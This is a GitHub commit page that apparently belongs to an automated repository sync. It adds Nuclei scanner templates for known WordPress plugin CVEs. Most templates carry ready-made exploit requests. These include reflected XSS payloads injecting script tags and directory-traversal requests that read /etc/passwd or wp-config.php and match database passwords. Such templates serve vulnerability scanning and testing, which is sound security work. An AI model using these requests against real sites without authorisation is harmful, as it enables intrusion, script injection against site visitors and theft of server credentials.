Skip to content

Commit

Permalink
20241208
Browse files Browse the repository at this point in the history
  • Loading branch information
actions-user committed Dec 8, 2024
1 parent 8c092e9 commit 42d0338
Show file tree
Hide file tree
Showing 52 changed files with 2,693 additions and 1 deletion.
2 changes: 1 addition & 1 deletion date.txt
Original file line number Diff line number Diff line change
@@ -1 +1 @@
20241207
20241208
50 changes: 50 additions & 0 deletions poc.txt

Large diffs are not rendered by default.

30 changes: 30 additions & 0 deletions poc/cve/CVE-2012-4242-2185.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2012-4242

info:
name: WordPress Plugin MF Gig Calendar 0.9.2 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4242

description: "Cross-site scripting (XSS) vulnerability in the MF Gig Calendar plugin 0.9.2 for WordPress allows remote attackers to inject arbitrary web script or HTML via the query string to the calendar page."

requests:
- method: GET
path:
- '{{BaseURL}}/?page_id=2&%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
30 changes: 30 additions & 0 deletions poc/cve/CVE-2012-4273-2195.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,30 @@
id: CVE-2012-4273

info:
name: 2 Click Socialmedia Buttons < 0.34 - Reflected Cross Site Scripting (XSS)
author: daffainfo
severity: medium
description: Cross-site scripting (XSS) vulnerability in libs/xing.php in the 2 Click Social Media Buttons plugin before 0.34 for WordPress allows remote attackers to inject arbitrary web script or HTML via the xing-url parameter.
reference: https://nvd.nist.gov/vuln/detail/CVE-2012-4273


requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/2-click-socialmedia-buttons/libs/xing.php?xing-url=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E'

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
25 changes: 25 additions & 0 deletions poc/cve/CVE-2014-4940-2384.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,25 @@
id: CVE-2014-4940

info:
name: WordPress Plugin Tera Charts - Directory Traversal
author: daffainfo
severity: high
description: Multiple directory traversal vulnerabilities in Tera Charts (tera-charts) plugin 0.1 for WordPress allow remote attackers to read arbitrary files via a .. (dot dot) in the fn parameter to (1) charts/treemap.php or (2) charts/zoomabletreemap.php.
reference: https://www.cvedetails.com/cve/CVE-2014-4940
tags: cve,cve2014,wordpress,wp-plugin,lfi

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tera-charts/charts/zoomabletreemap.php?fn=../../../../../etc/passwd"

matchers-condition: and
matchers:

- type: regex
regex:
- "root:.*:0:0"

- type: status
status:
- 200
35 changes: 35 additions & 0 deletions poc/cve/CVE-2015-1000012-2457.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: CVE-2015-1000012
info:
name: WordPress MyPixs <=0.3 - Local File Inclusion
author: daffainfo
severity: high
description: WordPress MyPixs 0.3 and prior contains a local file inclusion vulnerability.
reference:
- https://wpscan.com/vulnerability/24b83ce5-e3b8-4262-b087-a2dfec014985
- https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-1000012
- http://www.vapidlabs.com/advisory.php?v=154
- https://nvd.nist.gov/vuln/detail/CVE-2015-1000012
- http://web.archive.org/web/20210518144916/https://www.securityfocus.com/bid/94495
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2015-1000012
cwe-id: CWE-200
metadata:
google-query: inurl:"/wp-content/plugins/mypixs"
tags: cve,cve2015,wordpress,wp-plugin,lfi
requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/mypixs/mypixs/downloadpage.php?url=/etc/passwd"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: status
status:
- 200

# Enhanced by mp on 2022/06/06
35 changes: 35 additions & 0 deletions poc/cve/CVE-2016-1000127-2646.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,35 @@
id: CVE-2016-1000127

info:
name: AJAX Random Post <= 2.00 - Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin ajax-random-post v2.00
reference: https://nvd.nist.gov/vuln/detail/CVE-2016-1000127
tags: cve,cve2016,wordpress,xss,wp-plugin
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2016-1000127
cwe-id: CWE-79

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/ajax-random-post/js.php?interval=%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
39 changes: 39 additions & 0 deletions poc/cve/CVE-2016-1000153-2736.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,39 @@
id: CVE-2016-1000153

info:
name: Tidio Gallery <= 1.1 - Unauthenticated Reflected Cross-Site Scripting (XSS)
author: daffainfo
severity: medium
description: Reflected XSS in wordpress plugin tidio-gallery v1.1
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2016-1000153
- http://www.vapidlabs.com/wp/wp_advisory.php?v=427
- https://wordpress.org/plugins/tidio-gallery
- http://www.securityfocus.com/bid/93543
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2016-1000153
cwe-id: CWE-79
tags: cve,cve2016,wordpress,xss,wp-plugin

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/tidio-gallery/popup-insert-help.php?galleryId=%22%3E%3C%2Fscript%3E%3Cscript%3Ealert%28document.domain%29%3C%2Fscript%3E"

matchers-condition: and
matchers:
- type: word
words:
- "</script><script>alert(document.domain)</script>"
part: body

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
28 changes: 28 additions & 0 deletions poc/cve/CVE-2019-14205-3823.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,28 @@
id: CVE-2019-14205
info:
name: WordPress Ext Adaptive Images LFI
author: pikpikcu
severity: high
tags: cve,cve2019,wordpress,wp-plugin,lfi
description: A Local File Inclusion vulnerability in the Nevma Adaptive Images plugin before 0.6.67 for WordPress allows remote attackers to retrieve arbitrary files via the $REQUEST['adaptive-images-settings']['source_file'] parameter in adaptive-images-script.php.
reference: https://github.com/security-kma/EXPLOITING-CVE-2019-14205
classification:
cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.50
cve-id: CVE-2019-14205
cwe-id: CWE-22
requests:
- method: GET
path:
- '{{BaseURL}}/wp-content/plugins/adaptive-images/adaptive-images-script.php?adaptive-images-settings[source_file]=../../../wp-config.php'
matchers-condition: and
matchers:
- type: word
words:
- "DB_NAME"
- "DB_PASSWORD"
part: body
condition: and
- type: status
status:
- 200
32 changes: 32 additions & 0 deletions poc/cve/CVE-2021-24176-5636.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,32 @@
id: CVE-2021-24176

info:
name: WordPress JH 404 Logger XSS
author: Ganofins
severity: medium
description: JH 404 Logger WordPress plugin through 1.1 doesn't sanitise the referer and path of 404 pages, when they are output in the dashboard, which leads to executing arbitrary JavaScript code in the WordPress dashboard.
reference:
- https://wpscan.com/vulnerability/705bcd6e-6817-4f89-be37-901a767b0585
- https://wordpress.org/plugins/jh-404-logger/
tags: cve,cve2021,wordpress,wp-plugin,xss
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
cvss-score: 5.40
cve-id: CVE-2021-24176
cwe-id: CWE-79

requests:
- method: GET
path:
- "{{BaseURL}}/wp-content/plugins/jh-404-logger/readme.txt"

matchers-condition: and
matchers:
- type: word
words:
- "JH 404 Logger"
part: body

- type: status
status:
- 200
43 changes: 43 additions & 0 deletions poc/cve/CVE-2021-24342-5715.yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,43 @@
id: CVE-2021-24342

info:
name: JNews < 8.0.6 - Reflected Cross-Site Scripting (XSS)
author: pikpikcu
severity: medium
description: JNews WordPress theme before 8.0.6 did not sanitise the cat_id parameter in the POST request /?ajax-request=jnews (with action=jnews_build_mega_category_*), leading to a Reflected Cross-Site Scripting (XSS) issue.
reference:
- https://wpscan.com/vulnerability/415ca763-fe65-48cb-acd3-b375a400217e
- https://nvd.nist.gov/vuln/detail/CVE-2021-24342

classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.10
cve-id: CVE-2021-24342
cwe-id: CWE-79

requests:
- raw:
- |
POST /?ajax-request=jnews HTTP/1.1
Host: {{Hostname}}
Accept: */*
Content-Type: application/x-www-form-urlencoded
lang=en_US&cat_id=6"></script><script>alert(document.domain)</script>&action=jnews_build_mega_category_2&number=6&tags=70%2C64%2C10%2C67
matchers-condition: and
matchers:

- type: word
words:
- '</script><script>alert(document.domain)</script>'
part: body

- type: word
words:
- 'Content-Type: text/html'
part: header

- type: status
status:
- 200
63 changes: 63 additions & 0 deletions poc/cve/CVE-2022-0422(1).yaml
Original file line number Diff line number Diff line change
@@ -0,0 +1,63 @@
id: CVE-2022-0422

info:
name: WordPress White Label CMS <2.2.9 - Cross-Site Scripting
author: random-robbie
severity: medium
description: |
WordPress White Label CMS plugin before 2.2.9 contains a reflected cross-site scripting vulnerability. It does not sanitize and validate the wlcms[_login_custom_js] parameter before outputting it back in the response while previewing.
impact: |
Successful exploitation of this vulnerability could allow an attacker to execute arbitrary script code in the context of the affected website, potentially leading to session hijacking, defacement, or theft of sensitive information.
remediation: |
Update to WordPress White Label CMS plugin version 2.2.9 or later to mitigate this vulnerability.
reference:
- https://wpscan.com/vulnerability/429be4eb-8a6b-4531-9465-9ef0d35c12cc
- https://plugins.trac.wordpress.org/changeset/2672615
- https://nvd.nist.gov/vuln/detail/CVE-2022-0422
- https://github.com/ARPSyndicate/cvemon
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2022-0422
cwe-id: CWE-79
epss-score: 0.001
epss-percentile: 0.40139
cpe: cpe:2.3:a:videousermanuals:white_label_cms:*:*:*:*:*:wordpress:*:*
metadata:
max-request: 1
vendor: videousermanuals
product: white_label_cms
framework: wordpress
tags: cve2022,cve,wordpress,xss,wp-plugin,wpscan,videousermanuals

http:
- raw:
- |
POST /wp-login.php?wlcms-action=preview HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded
wlcms%5B_login_custom_js%5D=alert%28%2FXSS%2F%29%3B
matchers-condition: and
matchers:
- type: word
part: body
words:
- "alert(/XSS/);"

- type: word
part: body
words:
- "wlcms-login-wrapper"

- type: word
part: header
words:
- text/html

- type: status
status:
- 200
# digest: 490a0046304402202d864fa8ffa1dc0885d61b1e349c1c268e266c83d7d2e11e236e9df48039abe002205fb0b2d84d41d806cc6e52c0fdd1dbeed94827fa1019c490c3926ec16402eb79:922c64590222798bb761d5b6d8e72950
Loading

0 comments on commit 42d0338

Please sign in to comment.